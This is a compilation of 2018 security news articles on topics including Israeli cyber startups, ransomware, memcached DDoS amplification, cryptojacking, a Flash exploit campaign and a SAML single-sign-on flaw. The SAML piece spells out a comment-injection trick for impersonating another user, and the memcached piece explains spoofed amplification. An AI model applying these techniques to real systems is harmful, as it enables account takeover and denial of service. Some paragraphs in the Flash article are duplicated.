Don’t share serial numbers, IP addresses and other sensitive information regarding your smart devices on social networks
Be aware and always check the latest information on discovered IoT vulnerabilities.
No less important is that vendors should improve and enhance their security approach to ensure their devices are adequately protected and, as a result, their users. In addition to a cybersecurity check, which is just as vital as testing other features before releasing a product, it is necessary to follow IoT cybersecurity standards. Kaspersky Lab has recently contributed to the ITU-T (International Telecommunication Union — Telecommunication sector) Recommendation, created to help maintain the proper protection of IoT systems, including smart cities, wearable and standalone medical devices and many others.


From IDF to Inc: The Israeli Cybersecurity Startup Conveyor Belt
28.7.2018 securityweek BigBrothers

Israeli Defense Force (IDF) Unit 820

Understanding Why Israel Produces Many Cybersecurity Firms Starts With Understanding the Talent That Israeli Defense Force (IDF) Unit 8200 Produces

One definition of 'entrepreneur' is "a person who organizes and manages any enterprise, especially a business, usually with considerable initiative and risk." If Israel were a business, then its founders were entrepreneurs; and there is little wonder that the nation is imbued with an entrepreneurial spirit.

This spirit shapes Israeli business. Peter Rousseau, now with The Hackett Group, wrote last year, "Seventy-six Israeli companies are currently traded on the NASDAQ, behind only the United States and China. Israel exports $1,246 worth of hi-tech goods and services per capita compared to $488 for the U.S. and $295 for the rest of the world."

Nowhere is the entrepreneurial spirit better demonstrated than in the quantity and quality of contemporary cybersecurity firms that have come from Israel -- starting, perhaps, with Check Point. Check Point was founded in 1993 by Gil Shwed, Shlomo Kramer, and Marius Nacht. Shwed and Kramer had served together in the Israeli Defense Force (IDF) Unit 8200. One of Check Point's earliest employees was Nir Zuk, who moved on to become the founder and CTO of Palo Alto Networks. Zuk also served in IDF Unit 8200 -- and Unit 8200 is a pervasive thread that dominates Israeli cybersecurity firms.

Unit 8200 is the signals intelligence (SIGINT) and web intelligence (WEBINT) unit of the Israeli military; and is generally considered among the elite of the world's intelligence agencies. It is not the only technology unit in the IDF; but it is the offensive or proactive unit. All young Israelis do between 32 and 36 months military service from the age of 18. Those with a particular aptitude for SIGINT are literally 'creamed off' into Unit 8200.

Development of Israel's SIGINT

Unit 8200 did not spring from nothing with the formation of Israel in 1948. Jewish intelligence groups had been working in Palestine both with the ruling British administration, and against the British and Arabs -- sometimes simultaneously -- for many years. After 1948, the Israeli military became the IDF and established a military intelligence group codenamed 'Rabbit'. Rabbit was charged with intercepting and decoding Arab communications; a charge born of necessity.

Unit 8200 evolved out of Rabbit. Initially with little budget and low manpower, it was forced to develop its own technology and techniques -- the entrepreneurial spirit of the nation co-existed within its intelligence agency from its very origins.

The modern Unit 8200, however, grew out of the Yom Kippur War in 1973. On that Atonement Day, Israel was simultaneously invaded by Egypt and Syria. Although Israel eventually defeated the invaders it was at heavy cost in both lives and finance. Subsequent analysis showed that a failure in intelligence had left the nation unprepared -- and subsequent Unit 8200 reorganization was designed to prevent this ever happening again. Part of this was the conscious encouragement of 'chutzpah', (or audacity) among its staff.

This is the basis of today's Unit 8200: the cream of youth, highly trained in signals intelligence, encouraged to be audacious in thought and action, and imbued with an entrepreneurial spirit. These young people are then released back into society following their required national service in their early twenties. This is a situation unique in the world.

Israeli Cybersecurity Startups

When talented youth join the NSA or FBI or GCHQ or any other national intelligence agency, they are expected to do so for life, not just for three years. No other nation has this constant stream of highly trained, audacious and entrepreneurial young people entering the job market every year. What else should the more entrepreneurial alumni do but start their own firms using the skills they have acquired; and what else should others do but work in the R&D departments of these firms?

IDF's cybersecurity training

SecurityWeek spoke to several founders of Israeli cybersecurity firms. All of them served in technology units, and most in Unit 8200. Other military units have their own technology sections; and these also lead to spin offs. Examples could include Yuval Diskin, former director of Shin Bet, who started the cyber-tech company Diskin Advanced Technologies LTD; and Haim Tomer, formerly head of the Mossad's Intelligence Division, who is now a cybersecurity consultant. Despite such examples, however, it is the alumni of 8200 that dominate the new start-ups.

Understanding why Israel produces so many cybersecurity firms starts with understanding the converyor belt of talent that 8200 produces. Lior Div (CEO), Yossi Nar (CVO), and Yonatan Striem-Amit (CTO) are the three ex-8200 co-founders of Cybereason. "It starts," explains Liv, "with how people are selected to get into 8200. The Unit interviews all new draftees, using a series of tests looking at background, math proficiency, programming capabilities and pure intelligence. 8200 gets 'first pick'."

Just two military units get the lion's share of the best of the best: pilots for the air force, and 8200 for cyber warriors. Draftees serve anything from three to five years. During this period, special talent is fast-tracked. "By the time I was 19, I already had 10 developers reporting to me," said Div.

But it is fast-tracking in a unique environment. In commercial terms, the 'projects' are now well-funded and manned. "You are taught one thing in particular," he continued: "there is no such thing as impossible -- there is no notion of what you can and cannot do. You are given a problem, you work like crazy and eventually you solve the problem. So by the time you are released, around age 22 or 23, you are trained to solve cybersecurity problems."

This training is unique. Having chosen its new intake, said Div, "the military undertakes intensive training. After six months, 'trainees' have learned what a traditional university would take four years to teach -- and they have learned the practice of their subject and not just the underlying theory. By the time they leave, they are trained and confident cybersecurity warriors with new ideas."

This is confirmed by Boris Vaynburg, co-founder and CEO of Solebit. He and his two co-founders, along with 95% of his R&D staff, are all IDF technology unit alumni. He points out that in order to stay one step ahead of Israel's adversaries, Unit 8200 must take advantage of all known and unknown vulnerabilities in order to get into target networks. In essence, 8200 members get constant on-the-job red team training; and by the time draftees leave the military, they have a thorough understanding -- through use -- of the techniques used by hackers.

Eddy Brobitsky, CEO and co-founder of Minerva Labs, did not serve in Unit 8200. "Neither I nor my 2 co-founders served with 8200," he said, "We served in the unit that builds defensive solutions for the IDF. IDF doesn't want to rely on off-the-shelf products only -- it's important to develop your own products, so nobody will know how they work. We were focused on developing scalable products for cybersecurity and IT." It's worth noting that the IDF is, in these terms, the largest company in Israel. Building security defenses suitable for the entire IDF and Israel government is equivalent to building a security product that will scale to the largest commercial organizations.

But it's not just the practical expertise of service that benefits budding entrepreneurs -- it is the whole culture. We've seen that 'nothing is impossible' and chutzpah is encouraged; but there is also a completely different 'product' development culture. "Inside the IDF," explained Brobitsky, "the motivation for developing new security is to save human life. It's not about financial profit. All I had to do was show that a vulnerability existed and that someone could be hurt if there was a compromise, and I would get the budget to execute the project and build a defense."

It's not the same in the commercial world. "Later, when I worked in a bank which was driven by money," he continued, "I needed to show that any investment in cybersecurity would not hurt income but actually increase income. Its a very different approach. For example, if you fail in the IDF, you don't get fired -- you're still in the army. The army is always encouraging you to try and not accept defeat in any project; so it encourages innovation." While serving in the IDF, Brobitsky was involved in the development of between 20 and 30 different cybersecurity solutions for the entire IDF and government.

"So the environment is to try and try again until you succeed. In the real world, if you fail you will sometimes lose your job; and if you've already lost one job through not succeeding, you're always a bit afraid to try a different approach to things wherever you go.

A second difference with the outside world is the extent of 'networking' within Israel's technology world. Although there are different technology units with different priorities, there is constant intercommunication between them. Everybody knows everybody, commented Amit Rahav, VP of business development at Secret Double Octopus, "with veterans of the Israeli intelligence units seeking to hire these young guys righty away, appreciating the pre-selection, training and experience of the units they themselves came out of. This is to some extent similar to what happens at Ivy league MBA programs in the US."

From new idea to new company

From here there is a well-trod path. Turning what has been learned into a new company requires funding. Early-stage venture capital is available in Israel for good ideas. Not all ideas are good; but Israeli investors have become savvy in technology. Nobody wanted to say that there is smart money and dumb money, but it was a common acknowledgment that Israeli money is smart. Good ideas get funded and dumb ideas never get off the ground.

"Israeli venture capital is available, but it is hard to get and getting harder," explained Solebit's Vaynburg. "Any new idea has to be disruptive and unique with a strong team behind it. It's easier to get VC outside of Israel," he continued, "because the Israeli VC firms have become very cybersecurity savvy, and there are so many approaches for what is already an overcrowded market."

At the same time, of course, the cost of getting a product presentation team together and flown to the U.S. to present to a U.S. venture capital firm is exorbitant for what is, at this stage, likely to be not much more than proof of concept on a new idea. Seed funding tends to come from Israel itself.

What this generally means is that when a new cybersecurity firm is ready to expand outside of Israel, it is already a fair bet. That expansion usually means a move to the U.S. rather than the UK or Europe. For this there are three motivations -- all of which SecurityWeek has already heard in different contexts . Firstly there is far more venture capital available in the US than elsewhere. It's just beginning in Europe: there's some in Berlin, but little in London.

Secondly, despite the European Union, there are at least six different cultures and different languages to understand within the member nations, as opposed to, basically, just one American culture and language. Thirdly, and perhaps most importantly, new technology early-adopters are more prevalent in America -- and especially on the West Coast -- than anywhere else.

The real decision is not America or Europe, but West Coast or East Coast. While the majority might be attracted to the entrepreneurial attitude of the West Coast, others are attracted by the big financial customers of the East Coast. Boston-based CyberArk is one. "We figured the biggest adoption for security would first come financial services firms, and that very much lent itself to the East Coast," commented CEO Udi Mokady, another 8200 alumni.

The path from concept to company is illustrated by Solebit itself. "Solebit was established 3 years ago," said Vaynburg. "R&D is based in Israel. Our headquarters, however, is currently relocating to the Bay Area. We raised our seed funding from an Israeli venture capital firm [$2 million from Glilot Capital Partners in 2015], and Round A funding from a U.S. venture capital firm." The Round A funding is so new that, although it has closed, it is yet to be announced.

Lessons from the Israeli cybersecurity model

The sad truth is that the IDF situation in Israel is unique, and could not be copied anywhere else in the world. It provides a constant source of technological competence trained to be audacious, persistent and positive. Other SIGINT organizations around the world do not release their staff on to the job market, preferring to keep them. Retired NSA, CIA and FBI staff tend to join the boards of existing large corporations; they do not tend to start new companies. In the UK, retired GCHQ and Ministry of Defence (MoD) officers might become private consultants, offering experience and expertise -- but rarely new ideas.

One idea alone could translate to other countries. The IDF, the largest company in Israel, funds the university fees for promising students, requiring only that they work for the IDF for a period after graduation. Large western organizations could do similar, finding and nurturing young talent. The idea of serious cybersecurity talent emerging with a sought-after degree and no student debt should be alluring to all sides.


Samsung Smartphones Get Encrypted Communications
28.7.2018 securityweek Krypto

KoolSpan this week announced a partnership with Samsung to implement secure communications on Samsung smartphones.

KoolSpan, a provider of encrypted secure voice and messaging solutions for mobiles, is already offering secure communications to enterprises. With support for mainstream phones, which are normally used within organizations, the solutions bring end-to-end encryption to all internal calls and texts within a company.

The end result of the partnership between KoolSpan and Samsung is TrustCall Native for Samsung, which provides native dialer integration on Samsung devices and which is being demonstrated at the Mobile World Congress in Barcelona.

The solution is aimed at tackling the rise in attacks on mobile communications, which normally consist of calls and messages being intercepted through the exploitation of vulnerabilities in mobile internetworking protocols.

Last year, the U.S. Department of Homeland Security (DHS) issued a report to underline some of the issues plaguing mobile communications, suggesting that both deliberate and accidental threats to mobile security continue to exist.

TrustCall Native for Samsung is focused on addressing such concerns by offering more secure communications on Samsung smartphones. To ensure ease-of-use, it integrates with Samsung native functionality for phone, messaging and contacts and applies encryption automatically.

KoolSpan’s solution is managed, deployed and configured across all smartphones within an organization by the IT department and is integrated with the phone’s native dialer and messenger. TrustCall Native Secure Communications for Samsung is available for customers with a Samsung Enterprise Alliance Program (SEAP) account and a subscription to KNOX Configure.

“We’re excited to partner with KoolSpan, which enables us to implement secure communications on Samsung smartphones. TrustCall Native, one of KoolSpan’s flagship products, is the best example of the universal understanding that security is only as good as it is easy to use,” Mike Kazmierczak, Samsung B2B Business Development Manager, Mobile B2B Team, EMEA, said.


Thanatos Ransomware Makes Data Recovery Impossible
28.7.2018 securityweek
Ransomware

A newly discovered ransomware family is generating a different encryption key for each of the encrypted files but saves none of them, thus making data recovery impossible.

Dubbed Thanatos, the malware was discovered by MalwareHunterTeam and already analyzed by several other security researchers.

When encrypting files on a computer, the malware appends the .THANATOS extension to them. After completing the encryption, the malware connects to a specific URL to report back, thus allowing attackers to keep track of the number of infected victims.

The malware also generates an autorun key to open the ransom note every time the user logs in. In that note, the victim is instructed to send $200 to a listed crypto-coin address. Victims are also instructed to contact the attackers via email to receive a decryption program.

Thanatos’ operators allow victims to pay the ransom in Bitcoin, Ethereum, or Bitcoin Cash, thus becoming the first ransomware to accept Bitcoin Cash payments, Bleeping Computer’s Lawrence Abrams points out.

The issue with the new ransomware is that it, because it doesn’t save the encryption keys, files cannot be decrypted normally. However, victims don’t know that and might end up paying the ransom in the hope they can recover their files.

The good news regarding Thanatos, however, is that there might be a way to brute force the encryption keys, at least this is what security researcher Francesco Muroni suggests. However, this process would take a long time and would require for it to be a common file type with a known magic header.

Because of the botched encryption process, it is recommended to avoid paying the ransom if infected with Thanatos. Of course, this applies to every ransomware infection. It is also recommended to always keep applications up to date, and to use a security program capable of preventing this type of malware from compromising your systems.


Memcached Abused for DDoS Amplification Attacks
28.7.2018 securityweek
Attack

Malicious actors have started abusing the memcached protocol to launch distributed denial-of-service (DDoS) attacks, Cloudflare and Arbor Networks warned on Tuesday.

Memcached is a free and open source distributed memory caching system designed to work with a large number of open connections. Clients can communicate with memcached servers via TCP or UDP on port 11211.

Cloudflare noticed in recent days that memcached has been abused for DDoS amplification attacks, and so have Arbor Networks and Chinese security firm Qihoo 360. Cloudflare has dubbed this type of attack Memcrashed.

Attackers are apparently abusing unprotected memcached servers that have UDP enabled. Similar to other amplification methods, the attacker sends a request to the targeted server on port 11211 using a spoofed IP address that matches the IP of the victim. The request sent to the server is just a few bytes, but the response can be tens of thousands of times bigger, resulting in a significant attack.

The largest memcached DDoS attack observed by Cloudflare peaked at 260 Gbps, but Arbor Networks reported seeing attacks that peaked at 500 Gbps and even more.

“I was surprised to learn that memcached does UDP, but there you go!” said CloudFlare’s Marek Majkowski. “The protocol specification shows that it's one of the best protocols to use for amplification ever! There are absolutely zero checks, and the data WILL be delivered to the client, with blazing speed! Furthermore, the request can be tiny and the response huge (up to 1MB).”

Arbor Networks noted that the type of queries used in these attacks can also be directed at TCP port 11211, but since TCP queries cannot be reliably spoofed, this protocol is less likely to be abused. The company pointed out that Chinese researchers warned about the possibility of attacks abusing memcached in November.

In the attacks seen by Cloudflare, attackers abused servers from all around the world, but mostly from North America and Europe. A majority of the servers are hosted by OVH, DigitalOcean and Sakura.

The attacks monitored by the content delivery network (CDN) came from roughly 5,700 unique IPs associated with memcached servers, but experts expect to see much larger attacks in the future considering that Shodan shows nearly 88,000 open servers. A majority of the exposed systems are in the United States, followed by China and France.

Location of exposed memcached servers

“Arbor’s current assessment is that, as with most other DDoS attack methodologies, memcached DDoS attacks were initially – and for a very brief interval – employed manually by skilled attackers; they have subsequently been weaponized and made available to attackers of all skill levels via so-called ‘booter/stresser’ DDoS-for-hire botnets,” Arbor Networks researchers said in a blog post. “The rapid increase in the prevalence of these attacks indicates that this relatively new attack vector was weaponized and broadly leveraged by attackers within a relatively short interval.”

Cloudflare recommends disabling UDP support unless it’s needed, and advised system administrators to ensure that their servers are not accessible from the Web. Internet service providers (ISPs) can also contribute to mitigating these and other types of amplification attacks by fixing vulnerable protocols and preventing IP spoofing.


Ad Network Performs In-Browser Cryptojacking
28.7.2018 securityweek CoinMine

An ad network provider is performing in-browser Coinhive cryptojacking on websites that use its service, 360 Netlab security researchers warn.

The practice has been ongoing since December 2017, several months after the ad network provider, a company called PopAds Publisher, started using domain generation algorithm (DGA) technology to bypass ad blockers, claiming it would allow customers to “monetize traffic that wasn’t monetized before.”

In mid-2017, the provider started to generate seemingly random domains that would ensure ads can reach end users. By the end of the year, however, these domains, which 360 Netlab refers to as DGA.popad, started participating in cryptojacking activities, all without end-users’ acknowledgement.

Given that many people use ad blockers to prevent sites from displaying ads to them, ad networks often attempt to bypass blockers, and this provider decided to use DGA domains to host its advertisements. With these domains changing daily, it becomes difficult to block the ads, the researchers point out.

What’s more, the ad network provider recently started using the DGA.popad domains to perform cryptojacking. These domains, the researchers discovered, have a strong connection with Coinhive family domains in DNS traffic and serve the coinhive.min.js web miner.

Some of the DGA.popad domains have a high ranking, with one of them found in the top 2000 sites on Alexa and several others in the top 3000 list.

Once a user accesses such a site, their computer’s CPU starts being used to the full. According to 360 Netlab, the favicon.ico on the DGA.popad sites was found to run as a web miner. Most of the sites that would redirect users to DGA.popad domains are providing adult content and downloading services.

Because the impacted sites contain advertisements from this ad network, the cryptojacking activities are performed regardless of whether the user has an ad blocker installed or not.

Normally, users would be sent to a standard domain (serve.popads.net) hosted by the provider. If an ad blocker is used, the standard domain is blocked, and the visitor is sent to one of the DGA.popad domains. Regardless of the delivery mechanism, both the ad and the cryptojacking script are served.

“We are not able to make a detailed assessment. This is because only part of all the traffic passing DGA.popad and serve.popads.net will be inserted a web miner, but we are not sure which part will be selected, for now,” the researchers note.


Trump Yet to Order Spies to Retaliate Against Russia: NSA Chief
28.7.2018 securityweek BigBrothers

President Donald Trump has not yet ordered his spy chiefs to retaliate against Russian interference in US elections, the head of the National Security Agency told lawmakers Tuesday.

"We have not opted to engage in some of the same behaviors we are seeing," said Admiral Michael Rogers, who heads both the NSA -- the leading US electronic eavesdropping agency -- and the new US Cyber Command, the military body charged with online combat.

Asked in a Senate Intelligence Committee hearing if he had received orders from Trump to fight back against Moscow's meddling, Rogers said: "No, I have not."

Rogers denied claims that the agency is doing nothing to push back against Russian hacking, theft of US cyber secrets and other activities.

However, he acknowledged: "They have not paid a price that is sufficient to change their behavior."

Rogers echoed the comments he and five other US intelligence chiefs made two weeks ago at the House Intelligence Committee, where all said they had not been ordered by Trump to counter the Russians.

The US has accused Russia of actively interfering in the 2016 presidential election, stealing Democratic party communications and pushing out disinformation through social media.

It also accuses Moscow of stealing hacking secrets of the US intelligence community.

Rogers said an order for Trump is needed before the US intelligence community and military can undertake offensive online operations against the Russians.

"What I see on the Cyber Command side leads me to believe that if we don't change the dynamic here, that this is going to continue, and 2016 won't be viewed as isolated," he said.

But he said that at a lower level, the NSA and Cyber Command could take some unspecified actions to rebuff attackers.

Asked about the exchange in Congress, White House spokeswoman Sarah Sanders suggested the president does not need to act.

"Nobody is denying him the authority," she said of Rogers.


A vulnerability in Facebook exposed email and details of page administrator
28.7.2018 securityaffairs
Social

The security researcher Mohamed Baset discovered a vulnerability in Facebook that exposed email and other details of a page administrator.
Facebook has recently addressed an information disclosure vulnerability discovered by the security researcher Mohamed Baset that exposed page administrator.

According to Baset, the flaw is a “logical error” that he discovered after receiving an invitation to like a Facebook page on which he had liked a post.

Facebook administrator page -Like-

“One day i liked one of the posts of a specific page but i didn’t liked or followed the page itself after a few days i got an email notification from facebook regarding an invitation to like the page that i did already liked one of its posts, I was amazed by the feature but i realized that this is a feature to target non-fans and i was wondering what could go wrong since this is a new feature ?” state the blog post published by the expert.

“From the investigations that i’m doing sometimes in the office of the fraud and phishing emails i’m always and blindly showing the “Original” of the message (that can be achieved by clicking on the little drop-down menu arrow beside the message reply button)”

The researchers analyzed the source code of the email sent by the social network and discovered it includes the name of the administrator of the page and other info.

Facebook page administrator data leak

The researcher reported the issue to Facebook that acknowledged it and decided to award the expert $2,500 as part of its bug bounty program.

Facebook announced to have paid out more than $880,000 for 400 vulnerability reports submitted by hackers.

Many of you may consider that the issue is not so serious, but this isn’t true because under certain circumstance the data exposure could represent a threat to the users’ privacy

In the case of business or community pages, revealing the identities of the administrators could get them targeted by messages and comments.

“For many individual Facebook pages, the administrator and the page will share an identity, so putting the admin’s name in the page’s email isn’t really giving away much. But for business or community pages, which might have a number of co-administrators, you wouldn’t expect Facebook to reveal anything more than the name of the page itself, at least not without asking.” reads the blog post published by Sophos. “If nothing else, this protects individual employees from getting bombarded with comments and questions – whether they’re praises or rants – in place of the account itself.”


Recently patched CVE-2018-4878 Adobe Flash Player flaw now exploited by cybercriminals
28.7.2018 securityaffairs
Vulnerebility

Security researchers at Morphisec have uncovered a massive hacking campaign that is exploiting the recently patched CVE-2018-4878 Adobe Flash Player vulnerability.
Threat actors are exploiting the use-after-free flaw to deliver malware.

The CVE-2018-4878 vulnerability was fixed by Adobe on February 6, after security experts discovered it was used by North Korea-linked APT37 group in targeted attacks against South Korea.

Now the same vulnerability has been exploited by other threat actors in the wild as confirmed by Morphisec. The company spotted a campaign on February 22, the attackers were using a version of the exploit similar to the one used by the APT37 group.

The campaign is attributed to a financially motivated threat actor that exploited the CVE-2018-4878 in a malspam campaign, another thing highlighted by the researchers is that this exploit did not have a 64-bit version like the original one.

The attackers used spam emails containing a link to a document stored on safe-storage[.]biz. Once downloaded and opened, the document tries to trick victims with social engineering. It notifies users that an online preview is not available and instructs them to enable editing mode in order to view the content.

If the user enables the editing mode, the CVE-2018-4878 Adobe vulnerability is exploited and the Windows command prompt is executed. The associated cmd[.]exe file is then injected with malicious shellcode that connects to the attacker’s domain.

Security researchers at Morphisec have uncovered a massive hacking campaign that is exploiting the recently patched CVE-2018-4878 Adobe Flash Player vulnerability.

Threat actors are exploiting the use-after-free flaw to deliver malware.

The CVE-2018-4878 vulnerability was fixed by Adobe on February 6, after security experts discovered it was used by North Korea-linked APT37 group in targeted attacks against South Korea.

Now the same vulnerability has been exploited by other threat actors in the wild as confirmed by Morphisec. The company spotted a campaign on February 22, the attackers were using a version of the exploit similar to the one used by the APT37 group.

The campaign is attributed to a financially motivated threat actor that exploited the CVE-2018-4878 in a malspam campaign, another thing highlighted by the researchers is that this exploit did not have a 64-bit version like the original one.

The attackers used spam emails containing a link to a document stored on safe-storage[.]biz.

The URLs included in the emails is generated with Google’s URL shortening service, this circumstance allowed the researchers to determine the number of victims that clicked it. According to Morphisec each of the different links used in this campaign had been clicked tens and even hundreds of times within 3-4 days of being created.

Once downloaded and opened, the document tries to trick victims with social engineering. It notifies users that an online preview is not available and instructs them to enable editing mode in order to view the content.

CVE-2018-4878 malspam

If the user enables the editing mode, the CVE-2018-4878 Adobe vulnerability is exploited and the Windows command prompt is executed. The associated cmd[.]exe file is then injected with malicious shellcode that connects to the attacker’s domain.

“On February 22, 2018, Morphisec Labs spotted several malicious word documents exploiting the latest Flash vulnerability CVE-2018-4878 in the wild in a massive malspam campaign.” states the analysis published by Morphisec.

“After downloading and opening the Word document, the attack exploits the Flash vulnerability 2018-4878 and opens a cmd[.]exe which is later remotely injected with a malicious shellcode that connects back to the malicious domain.”

Then the shellcode downloads a dll from the same domain, which is executed using Microsoft Register Server utility to bypass whitelisting solutions.

According to the experts, only a limited number of security solutions flag the bait documents as malicious.

“As expected and predicted, adversaries have quickly adopted the Flash exploit, which is easily reproducible. With small variations to the attack, they successfully launched a massive malspam campaign and bypassed most of the existing static scanning solutions once again.” concluded Morphisec.


Widespread Vulnerability Found in Single-Sign-On Products
27.7.2018 securityweek
Vulnerebility

A behavioral quirk in SAML libraries has left many single-sign-on (SSO) implementations vulnerable to abuse. It allows an attacker that has gained any authenticated access to trick the system into granting further access as a different user without knowledge of that user's password.

This could be used by an attacker who has compromised a low level limited access account to acquire access to third-party cloud services -- or it could be used by a malicious insider seeking access to reserved network areas (such as the payroll databases, or HR records).

The vulnerability was discovered by the research team of Duo Security, itself an SSO provider; and is described in a blog posted today. It affects many of the leading SSO providers, and probably affects the majority of proprietary company SSO developments.

Duo has confirmed the flaw in OneLogin - python-saml (CVE-2017-11427); OneLogin - ruby-saml (CVE-2017-11428); Clever - saml2-js (CVE-2017-11429); OmniAuth-SAML (CVE-2017-11430); Shibboleth (CVE-2018-0489); and Duo Network Gateway (CVE-2018-7340).

Security Assertion Markup Language (SAML) is the underlying protocol used by most SSO implementations. It is what allows authentication to be passed between a company's identity store and, for example, a third-party service. Typically, a user will log onto the identity store. This contains the credentials that will allow the same user to access other services.

SAML is used to pass authentication, via the browser, from the identity provider to the third-party service, granting access. The flaw lies in how authentication is encoded by SAML in the provider's 'response'.

The SAML authentication response contains two primary elements: the assertion and the signature. The assertion element says this NameID is authenticated. The signature element is designed to prevent the authenticated user NameID being changed at any point between the identity provider and the service being accessed. "If the attacker can modify the 'NameID' without invalidating the signature, that would be bad," suggest the Duo researchers; and then proceed to explain how it can be done.

"One of the causes of this vulnerability is a subtle and arguably unexpected behavior of XML libraries like Python’s 'lxml' or Ruby’s 'REXML'," write the blog's authors. Comments can be included in the signature, but the canonicalization process of the SAML libraries tend to drop all text after the first text node to isolate the NameID.

"So," explain the researchers, "as an attacker with access to the account 'user@user.com.evil.com', I can modify *my own* SAML assertions to change the NameID to 'user@user.com' when processed by the SP." The seven characters are <!----> inserted before .evil.com. This causes the canonicalization process to drop '.evil.com', leaving the authenticated account as 'user@user.com'.

Not all SSO implementations are vulnerable to this glitch; but Duo has demonstrated that many are. All that is required from the attacker is a genuine account that he can 'modify' to his attack target, plus the relatively minor technical savvy to intercept and edit the SAML authentication as it passes through the browser.

"Remediation of this issue," notes the report, "somewhat depends on what relationship you have with SAML." It gets a bit complicated. "Duo has released updates for the Duo Network Gateway in version? ?1.2.10?. If you use the DNG as a SAML Service Provider and are not at version 1.2.10 or higher (at the time of writing this, 1.2.10 is the latest version), we recommend upgrading."

Different affected SSOs will have different specific recommendations, and it would be best to refer to them for guidance. Similarly, there are different recommendations for maintainers of identity or service providers, maintainers of SAML processing libraries, and maintainers of XML parsing libraries. One thing that would help, suggest the authors, is the ability to enforce multi-factor authentication, "because this vulnerability would only allow a bypass of a user’s first factor of authentication." But the authors also warn, "if your IdP is responsible for both first factor and second factor authentication, it’s likely that this vulnerability bypasses both!"

Because multiple vendors are affected by this vulnerability, Duo Security worked with CERT/CC to co-ordinate disclosure. It provided the vulnerability information to CERT/CC on 18 December 2017. By 20 February 2018, all notified affected vendors had confirmed they were ready for disclosure; and Duo Security has disclosed the vulnerability details today.

Ann Arbor, Michigan-based Duo Security, a cloud-based provider of identity and access management solutions, announced a $70 million Series D funding round led by Meritech Capital Partners and Lead Edge Capital in October 2017. This brought the total amount raised to $119 million, and valued the company at $1.17 billion.


Industrial Cybersecurity Firm CyberX Raises $18 Million
27.7.2018 securityweek IT

Industrial cybersecurity startup CyberX announced today that it has raised $18 million in a Series B funding round, bringing the total amount received to date by the company to $30 million.

The latest funding round was led by Norwest Venture Partners, which also invested in FireEye and Symantec-acquired Fireglass, with participation from previous investors Glilot Capital Partners, Flint Capital, ff Venture Capital, and OurCrow.

CyberX says it plans on using the additional funding to continue its expansion in Europe and the United States, drive international growth, and expand its product development, research, and threat intelligence teams.

Founded in 2013 by military cyber experts Nir Giller and Omer Schneider, CyberX offers a platform that continuously monitors networks and collects data to help detect potentially malicious activity. The company also recently unveiled simulation technology designed to help predict breach and attack vectors.

CyberX says its product has been used by Global 2000 organizations across the energy and utilities, chemical, oil and gas, manufacturing, and other critical infrastructure sectors.

“There is a growing need in many enterprises to connect their IIoT and ICS networks to corporate IT networks for performance, monitoring, and manageability reasons. This trend creates a new security risk which requires a modern, IIoT-optimized, security solution.” said Dror Nahumi, general partner at Norwest Venture Partners. “We are extremely impressed with CyberX’s solution and its successful adoption with top-tier enterprise customers across multiple verticals.”

“We’re proud that our team has delivered a series of industry-firsts, including the first anomaly detection platform to incorporate ICS-specific threat intelligence, risk and vulnerability assessments, and automated threat modeling, as well as native integration with SOC tools,” said Giller. “By providing SOC teams with deeper visibility into Operational Technology (OT) assets, behaviors, and threats, we’re helping organizations implement a unified approach across IT and OT security and remove silos between IT and OT -- thereby improving their combined IT/OT risk posture.”

CyberX previously raised $20,000 in 2013, $2 million in 2014, and another $9 million in 2016, which, along with some add-on investments to the Series A round brought the total raised so far to $30 million. The company noted that its latest funding is the largest B round to date in industrial cybersecurity.


Facebook Flaw Exposed Page Administrators
27.7.2018 securityweek
Social

Facebook recently patched an information disclosure vulnerability that exposed page administrators, researcher Mohamed Baset reported this week.

Baset claimed he discovered the issue, which he described as a “logical error,” within a few minutes of receiving an invitation to like a Facebook page on which he had liked a post.

Looking at the email’s source code, the researcher noticed that it included the name of the page’s administrator and other details.

Facebook emails expose information on page admins

After being notified through its bug bounty program, Facebook acknowledged the vulnerability and decided to award the expert $2,500 for his findings.

Sophos’ Paul Ducklin has provided an explanation on why such an information disclosure flaw can pose a problem to Facebook page administrators.

“For many individual Facebook pages, the administrator and the page will share an identity, so putting the admin’s name in the page’s email isn’t really giving away much,” Ducklin said. “But for business or community pages, which might have a number of co-administrators, you wouldn’t expect Facebook to reveal anything more than the name of the page itself, at least not without asking.”

“If nothing else, this protects individual employees from getting bombarded with comments and questions – whether they’re praises or rants – in place of the account itself,” the expert added.

Baset, founder and lead penetration tester at Seekurity, said this was the second time he reported a vulnerability to Facebook without having to write any code to demonstrate his findings.

Facebook reported recently that last year it paid out more than $880,000 for 400 valid vulnerability reports submitted by white hat hackers.


Splunk to Acquire Security Orchestration Firm Phantom for $350 Million
27.7.2018 securityweek IT

Machine data solutions firm Splunk said on Tuesday that it has agreed to acquire Phantom Cyber, a provider of Security Orchestration, Automation and Response (SOAR) solutions.

Under the terms of the agreement, Splunk will pay approximately $350 million in cash and stock to acquire Palo Alto, Calif.-based Phantom.

Phantom, which has raised more than $23 million in funding, has developed a community-powered security automation and orchestration platform that currently has more than 200 “apps” which integrate with various security products. These apps are available for a wide range of security tools from partners including Cisco, McAfee, Palo Alto Networks, RSA Security, Symantec, Splunk, HPE, IBM and others.

By combining technologies from both companies, Splunk says that IT teams will be able to leverage automation capabilities to “help solve automation challenges in a widening range of use cases, including Artificial Intelligence for IT Operations (AIOps).”

Following the acquisition, Phantom founder and CEO Oliver Friedrichs will report to Haiyan Song, senior vice president and general manager of security markets at Splunk.

The acquisition is expected to close during the first half of 2018, subject to customary closing conditions and regulatory reviews.

“The majority of purchase price consideration will be paid from cash on our balance sheet. Total equity consideration plus Phantom employee retention incentives will result in less than one percent total dilution from this transaction,” said Dave Conte, chief financial officer, Splunk.

Investors in Phantom include, iconic Silicon Valley VC firm Kleiner Perkins, TechOperators Venture Capital, Blackstone, Foundation Capital, In-Q-Tel, Rein Capital, Zach Nelson, and John W. Thompson.


Changes in Apple’s iCloud Security Policies and Argument of China
27.7.2018 securityaffairs BigBrothers

Changes in Apple’s iCloud Security Policies – Apple announced to relocating the encryption key for users data in China; from the United States of America to some country in Asia!
The latest chaos in the digital world regarding Apple has stricken like a bullet, as the iPhone manufacturer announced to relocating the encryption key for users data in China; from the United States of America to some country in Asia!

Well, some security advocates argue that this is incorrect for the corporation itself as well as a privacy threat for users, but according to Apple Company; the codes are secure.
According to the reports, the users of iCloud in China are confused that in what way Apple will manage the confidentiality of their essential data.

Apple too fears that data protection employees have concerns about changing the privacy of iCloud users in China, as per two reports this week.
